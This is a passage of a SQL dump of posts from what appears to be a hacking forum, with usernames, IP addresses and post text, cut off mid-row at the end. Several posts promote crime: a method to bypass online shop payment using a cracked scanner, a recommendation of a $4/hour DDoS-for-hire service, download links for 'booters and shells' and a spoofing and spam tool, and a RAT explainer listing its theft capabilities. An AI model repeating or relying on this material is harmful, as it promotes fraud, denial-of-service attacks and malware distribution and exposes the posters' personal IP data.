`mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2702', '536', '2686', '4', 'RE: Hey everyone!', '0', '1', 't3h jok3r', '1348795288', 'Welcome to L33THacking popart. Hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '480057e70c2c5c05e0eb9787ed7342bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2703', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '1', 't3h jok3r', '1348795357', 'Is it possible the userbar could be transparent?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5dc3c4e9b1213cbb6fa6637223c5ee74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2704', '533', '2669', '23', 'RE: How to Avoid JDB\'s', '0', '1', 't3h jok3r', '1348795406', 'Nice tutorial or how about remove java from your PC so it won\'t ever ask to run? ;)', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '69c848145e0ad8b7fbe6d47f7460a1f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2705', '490', '2381', '49', 'RE: Forum Suggestion', '0', '1', 't3h jok3r', '1348795499', 'Honestly I don\'t know if I should make them into sub-forums or not. Sub-forums would be more organized as Reloadzor said but under the tab there would be only two forums.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ccc380df33946762e377be108e4f6db2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2706', '527', '2652', '47', 'RE: Get my private free ebay items ebook and more', '0', '4', 'Triple H', '1348795705', 'Oh yeah i fogot. I updated the op', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '946ea3497a56d322aadfe1b62f2ee94b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2707', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '4', 'Triple H', '1348795772', 'That\'s the nice achievement. Keep going l33thacking', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '30561179bcf18b37ff984aed0aa9aaf7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2708', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '4', 'Triple H', '1348795826', 'Thanks, this contains everything you might want to know about DDoSing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fa2a0fe00cbce26a04cff26ee1ef2bff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2709', '285', '1339', '12', 'RE: How to track location of person on any chat box', '0', '4', 'Triple H', '1348795909', 'Pretty old school style on getting the victims location.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e6ae299455d85b54f5ba328ea0e3acf2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2710', '537', '0', '12', '[Very Hot!] How to bypass online shop payment! [Video]', '0', '4', 'Triple H', '1348795938', 'I\'ve decided to let you in on a little secret. I will show you how to bypass online shops payment, and how to get free stuff from pages like ClickBanks :) It is very easy to accomplish, and you will be able to get a lot of useful free things :) Keep in mind that I made this video for another forum, but you can use it aswell :) You will need a tool called Acunetrix for this to work, but you should be able to find a cracked edition online. Well, I\'ll just post the video below and you\'ll be able to see for yourself. This will work on most Clickbanks shops, and a good deal of other shops which contain some sort of \'thank you\' page. Post any questions or thoughts below for a discussion of this method :) [video=youtube]http://www.youtube.com/watch?v=6In0YQPX4K8[/video]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b9e7d37228acb422e202271e16328043', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2711', '19', '54', '16', 'RE: [tut]How to SE your school teachers', '0', '5', 'Timmy', '1348796258', 'And this right here is the best Social Engineering guide I have ever seen.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8aaf071dca2964d3e258e7919dd7d192', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2712', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '5', 'Timmy', '1348796310', 'Can I get this too? I need it when I\'m bored :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4610f0cf200f59938aafc2efe0b87770', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2713', '248', '1056', '16', 'RE: [Free][EBook] How to SE a 3DS', '0', '5', 'Timmy', '1348796358', 'Thanks for the update and are you referring to nintendo 3Ds?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b46720095fe8425e60f66a4ea9ac7776', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2714', '494', '2650', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '5', 'Timmy', '1348796474', '[quote=\'iTzIpod\' pid=\'2650\' dateline=\'1348712560\'] [quote=\'Triple H\' pid=\'2647\' dateline=\'1348712278\'] Never underestimate a Chinese :) I still don\'t believe it though. [/quote] I know right? I don\'t believe it too. But after more research of this, dang. It\'s true. It\'s something you don\'t want to believe, but you kinda have too. [/quote] I agree with you guys it\'s too hard to believe.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '11f0dad3da8240070817c5a41ffc9b14', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2716', '536', '2686', '4', 'RE: Hey everyone!', '0', '200', 'Poptart', '1348797777', 'Thanks everyone for the warm welcomes :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', 'a77d7b088659b04901176ea9bc88d80e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2717', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '200', 'Poptart', '1348797830', 'Looks really neat. Thanks for the share! :D', '24.212.197.164', '416597412', '0', '0', '0', '0', '1', '47c3ae8371d7fa4a6efea83cecd335b6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2718', '431', '2703', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348800341', '[quote=\'t3h jok3r\' pid=\'2703\' dateline=\'1348795357\'] Is it possible the userbar could be transparent? [/quote] I was just going to ask this.. I want the background transparent please.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'dd2d718fc10cc4b35e8594d528ee2af8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2719', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348831812', 'Thank you Poptart. :D Hopefully one day you can join Unique :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c441c9a885c483ff305e79f2fb42d13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2720', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348831852', 'Thanks Poptart :D Hope you can get 100 posts soon When you do, I\'ll congratulate you ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '01b803251086f669d8a24856a368aa1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2721', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348831887', 'No problem. It\'s the least I can do.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6d88b6e9b64639dff1da97f58bdd8553', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2722', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348831916', 'You\'re right. But I don\'t know how to do that so... Sorry. :/ Thanks for your feedback though! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e4c5890b470c04bed7ae00e8b066951', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2723', '390', '1796', '35', 'RE: Which Photoshop version do you use?', '0', '82', 'iTzIpod', '1348831964', 'That\'s cool. Can you show us some of your examples?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6bcfabb3b54386f248c9301d9bb120f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2724', '449', '2074', '35', 'RE: Kratos God Of War Signature/Tag', '0', '82', 'iTzIpod', '1348832047', 'Thanks for your feedback mate ;)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e1943b0a5fa59a80f994a1222e18c124', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2725', '257', '1141', '35', 'RE: Nice Video Edit', '0', '82', 'iTzIpod', '1348832128', ':D Thanks for the assistance for my brother\'s Youtube channel :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '631ef9af8b9b8a4bfe632782c0440c63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2726', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '82', 'iTzIpod', '1348832276', 'Very nice tutorial :D Thanks for the share.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '275dd196754dc24c26a7e620f68b33a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2727', '536', '2686', '4', 'RE: Hey everyone!', '0', '82', 'iTzIpod', '1348832350', 'Welcome to L33tHacking.net bro. Enjoy your stay! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c01c40f298e9053794a87266f1783fab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2728', '209', '819', '35', 'RE: Sick Mozilla Firefox Wallpaper/Desktop Background', '0', '82', 'iTzIpod', '1348832381', 'No problem dude. Enjoy your new desktop background! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '55e908acf670f54e0e822e967659688a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2729', '248', '2713', '16', 'RE: [Free][EBook] How to SE a 3DS', '0', '82', 'iTzIpod', '1348832469', '[quote=\'Timmy\' pid=\'2713\' dateline=\'1348796358\'] Thanks for the update and are you referring to nintendo 3Ds? [/quote] Yes I am. And no problem. I had to fix the links because they were broken. ;) Or, someone had to do it...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ebb6a61392879936853a7269a21c6cd0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2730', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '82', 'iTzIpod', '1348832529', 'Welcome back is the least I could say. How was it? And where did you go? OT: He\'s back in business everyone. :D I recommend his DDoSing service!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '54e7ae30872aee6f2bd2943fcd29bcaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2731', '490', '2381', '49', 'RE: Forum Suggestion', '0', '82', 'iTzIpod', '1348833257', 'Sub forums. In my opinion, they are more organized. Just like Reloadzor said. Subforums like PC Xbox PS3 Nintendo I don\'t know', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd38d19e4b24fd5bb539378465a75986f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2732', '538', '0', '63', 'Staff userbar', '0', '61', 'NXK', '1348851804', 'Admins and mods got new ones.. Wheres the staff userbar :( Admins got a new new one too.. someones gotta make a new staff one :D (On phone sorry if this is LQ)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ecbb7238af4da24b3348aaf5b51e9295', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2733', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1348853185', 'gif\'s lose quality with a transparent background, I know it\'s silly but its true. I made it matching the background where its going to be since theres no affect on quality then, i could give a shot with transparent one but it will lose quality, thats the downside of animated stuff', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ef4005135854a9d999cb5b0516f35054', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2734', '398', '1860', '21', 'RE: [Cheap] [Strong] GRONgamer\'s DDoS\'ing Service! [$4/Hour]', '0', '100', '??zg???g????61', '1348857174', 'Just fine :D I\'m hitting harder then ever too.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8a85fa71426a2b7550e4e4c7289f901d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3498', '684', '0', '19', '[Junk]Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '1', 't3h jok3r', '1349473660', 'Welcome to the official thread of wTools. wTools is a next-gen application for multiple tools all built into one free program. Below you can find a list and screenshots of all the current features in the program. There\'s been a lot of work put into this, so I hope you guys enjoy it, and please leave me a comment if you try it out! Thanks to AeonHack for use of his themes. The program is not obfuscated, as this is open source software! [size=medium]Name:[/size] wTools [size=medium]Features:[/size] [list] [*] Easy-To-Use GUI [*] IP Pinger [*] IP Tracer [*] CloudFlare Resolver [*] Email Spoofer - Need to fix [*] Skype Tools [list] [*] Mass Messenger [*] Mass Messenger Spammer [*] Spammer [*] Annoying Spammer [/list] [/list] [size=medium]Download Link:[/size] http://www.filefactory.com/file/1p5kd0vfkz65/n/wTools_v1.4.zip [size=medium]Virus Scan:[/size] https://www.virustotal.com/file/65032ecd93146da06798e5a5ca728d001a7c6e705908f300837df5230b1a6e30/analysis/1347939496/ (false positive) [size=medium]Screenshots:[/size] [spoiler] [img]http://i.minus.com/jbagHnwlkb761z.png[/img] [img]http://i.minus.com/i9H03kqDs9bo4.png[/img] [/spoiler] Credis: I think Breshie', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '15e101633844404c966b18c48a0770c6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2736', '539', '0', '4', 'YO WHAT UP!', '2', '203', 'NeonLights', '1348859969', 'HEY im neonlights and well im from another called ubers.org :) was invited here to do some work and well... thats that my ubers profil: http://www.ubers.org/member.php?action=profile&uid=94465 a bit about me: i like smoking weed i like listening to rap i have a girlfriend so dont harrasse me and some other shit :D i suuuck at making these type of threads so.... yea', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', '081566f0fa2e21e3ac4db0bce5d639cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2737', '539', '2736', '4', 'RE: YO WHAT UP!', '0', '62', 'R?????zo?', '1348860608', 'welcome bro, and stay HQ :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '2c306d260deaaa074517c83899ebc86e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2738', '539', '2737', '4', 'RE: YO WHAT UP!', '0', '203', 'NeonLights', '1348861515', '[quote=\'R?????zo?\' pid=\'2737\' dateline=\'1348860608\'] welcome bro, and stay HQ :) [/quote] :) someguy sent me here from ubers saying i would get an updrade or something if i help the site out with some problems...', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', '4d675e31416afbc4e872fd9b2e219cd6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2739', '540', '0', '15', 'Collection Of Booters and Shells', '19', '203', 'NeonLights', '1348861770', '[align=center][img]http://imageshack.us/a/img228/4622/bootersandshells.jpg[/img] scan: https://www.virustotal.com/file/ccea24d5e6df53485693eda0df3eebf06d166bbb4b7aa2888688e06c5e25cf91/analysis/1347831754/ [lock]download: http://adf.ly/382489/http://www.mediafire.com/?0m19dkgnk672spm[/lock] enjoy guys :)[/align]', '67.68.75.99', '1128549219', '1', '0', '1', '1352011692', '1', '1559cf34e886a56782d45fb0b97077ce', '0', '1352011692'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2740', '541', '0', '21', '[INFO] what is a botnet/RAT? complete explanation', '0', '203', 'NeonLights', '1348861860', '[align=center]What is a botnet? ----------------- a botnet is a network of bots (sometimes explained as a contraction of the word \"robots\")... essentially a bot is a program that, much like a RAT, allows a 3rd party to direct the affected machine to perform certain tasks; however, unlike a RAT, bots don\'t sit around on the affected machine waiting for a 3rd party to find and connect to them - instead they go out and connect to one or more communication points where other instances of the bot have also connected to and await instruction... in this way the 3rd party can give instructions thousands of affected computers at once... the simplest botnet configuration is where all the bots connect to a single hub (such as an IRC chat room) where the bot master (the 3rd party controlling the bots) will give them instructions... although this is conceptually simple, it suffers from problems of scale - the more bots connected to a central communication server the harder it will be for that server to cope with all the connections... a hierarchical network, where the bot master communicates with only a few (hundred?) bots which in turn each command a few (hundred?) more and so on, is also possible... this has the benefit of scaling better and allowing the bot master to cultivate a much larger botnet... a third possible configuration is a peer to peer network between bots so that the bot master need only communicate with a single bot which in turn spreads the command to it\'s bot peers... a peer to peer configuration can help with scaling as well but the more significant strength is it\'s non-reliance on a central communication point that might get attacked and/or shut down... in addition to the more sophisticated communication pathway between the machine and the remote 3rd party another difference between a bot and a RAT is that, although a bot gives control of the affected machine to a remote 3rd party, a bot would never be used for remote administration purposes... a botnet\'s strength is in aggregating control over huge numbers of machines and while a remote control software may be a legitimate means to perform quick and dirty remote administration of one or two machines, when you get to large numbers more formal techniques and technologies (such as group policy or active directory) become appropriate... one way bots can get installed on a system by tricking the user into running an email or instant message attachment or other file downloaded from the internet and in this case the bot would qualify as a trojan horse at the very least... bots also are often able to spread themselves to systems by self-replication either as worms or viruses or both... in fact self-replication is often the best way to affect large numbers of systems (as we have seen time and again with worms like blaster and slammer)... -------------- What is a RAT? -------------- A remote access tool (a RAT) is a piece of software that allows a remote \"operator\" to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, \"RAT\" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victims knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software. The operator controls the RAT through a network connection. Such tools provide an operator the following capabilities:[1] Screen/camera capture or image control[2] File management (download/upload/execute/etc.)[3] Shell control (from command prompt)[4] Computer control (power off/on/log off if remote feature is supported) Registry management (query/add/delete/modify)[5] Other software product-specific functions Its primary function is for one computer operator to gain access to remote PCs. One computer will run the \"client\" software application, while the other computer(s) operate as the \"host(s)\". Reverse connection In this mode of operation remote computer(s) acts as the \"Host\" for the RAT software, for the \"client\" remote administrator to control. RATs that use this method of connectivity have the following operational advantages. Outgoing connections are generally perceived as less threatening to the remote \"host\" user, as it is the remote user who activates the download of the remote administration tool software. This procedure usually allows the software tool to avoid being blocked by a firewall, such as used in a router device. Since the remote \"host\" computer itself is connecting to the remote administrator, it will not be necessary for the remote administrator to know the remote \"host\" computers IP address to send the software tool. Direct connection: It is possible to remotely install a piece of software on a computer with the intention of taking control of that computer without the legitimate operator becoming aware of it. This connection type can normally only be made if the remote computer operator has the I.P address of the computer required to be controlled. Most \"firewall\" software usually \"blocks\" this type of invasive software. However, experienced computer software programmers have developed sophisticated programs to \"bypass\" typical firewall software. There is a continual process to produce counter measures against such intrusive software programs.[6] Security is an important factor when choosing a remote support solution for any enterprise. Gone are the days where security was just a matter of the highest degree of encryption. Today, a truly secure remote support solution will allow organizations to centrally control who can do what and where safe in the knowledge that when each remote session has finished it should be able to document what actually took place. For systems in environments that need to meet and maintain compliance requirements,[7] remote administration software must have strict security control. Software like Netop Remote Control 10 is able to exceed the toughest security standards including PCI DSS, ISO 27001, FIPS and HIPAA. It is necessary to examine[8] the remote control software functionality that best serves organizations that need a highly secure tool that crosses all platforms and devices and is completely scalable in any environment. It will help IT professionals select a remote control solution that increases productivity and customer satisfaction, as well as enhances the flexibility of the IT organization and improves the company’s risk profile. RAT trojan horses: Many trojans and backdoors now have remote administration capabilities allowing an individual to control the victim\'s computer. Many times, a file called the server must be opened on the victim\'s computer before the trojan can have access to it. These are generally sent through email, P2P file sharing software, and in internet downloads. They are usually disguised as a legitimate program or file. Many server files will display a fake error message when opened, to make it seem like it didn\'t open. Some will also kill antivirus and firewall software. RAT trojans can generally do the following: Block mouse and keyboard Change your desktop wallpaper Download, upload, delete, and rename files Drop viruses and worms Edit Registry Format drives Grab passwords, credit caard numbers Hijack homepage Hide desktop icons, taskbar and files Log keystrokes, keystroke capture software Open CD-ROM tray Overload the RAM/ROM drive Print text Play sounds Control mouse or keyboard Record sound with a connected microphone Record video with a connected webcam Shutdown, restart, log-off, shutdown monitor Steal passwords View screen View, kill, and start tasks in task manager A well designed RAT will allow the operator the ability to do anything that they could do with physical access to the machine. Some RAT trojans are pranks that are most likely being controlled by a friend or enemy on April Fool\'s Day or a holiday. Prank RATS are generally not harmful, and won\'t log keystrokes or store information about the system on the computer. They usually do disruptive things like flip the screen upside-down, open the CD-ROM tray, and swap mouse buttons. However, they can be quite hard to remove. It is much safer (in terms of law) to use a VBS script instead, as you can get the same results without getting in trouble by the police for a minor \"April fool\'s joke\". See: Script kiddie Typical RAT software and trojans: Back Orifice Bandook RAT Bifrost DarkComet RAT LANfiltrator Optix Pro Poison Ivy ProRat Sub Seven Y3K Remote Administration Tool Blackshades NET Xtreme RAT Lostdoor CyberGate Pytho RAT nJrat ------------------------------------------------------------- Hope this helped ppl that where wondering the difference between these two types of programs :) ~neonlights~[/align]', '67.68.75.99', '1128549219', '1', '0', '0', '0', '1', '7b781f7f58fb229220a832961895a0a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4167', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349904166', 'wich post? lol arent all my posts HQ D:', '67.68.75.160', '1128549280', '1', '0', 